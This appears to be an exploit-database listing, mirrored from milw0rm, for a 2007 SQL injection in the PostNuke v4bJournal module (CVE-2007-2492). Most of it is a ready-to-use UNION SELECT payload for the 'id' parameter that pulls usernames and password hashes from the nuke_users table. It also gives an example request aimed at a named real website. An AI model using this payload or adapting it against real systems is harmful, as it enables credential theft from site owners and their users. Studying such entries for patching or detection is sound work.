[] NeoSense
E X P L O I T S
title author type platform port cve id

PostNuke Module v4bJournal - SQL Injection

Author: Ali Abbasi
type: webapps
platform: php
port: 
date_added: 2007-05-01 
date_updated:  
verified: 1 
codes: OSVDB-35703;CVE-2007-2492 
tags: 
aliases:  
screenshot_url:  
application_url: 
----------------------------------------
PostNuke Journal
----------------------------------------

                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran

   Greetz For All Y! UnderGround Group Members ( www.2600.ir )

    Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

         Contact:     abbasi@ustmb.ac.ir


                                   {SQL BUG}



in
    index.php?module=v4bJournal&func=journal_comment&id=(SQL)




------------------------------------------

         EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS@YAHOO.COM



   index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*


U must regrister first ( You Most Register First )
-------------------------------------------

# milw0rm.com [2007-05-02]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.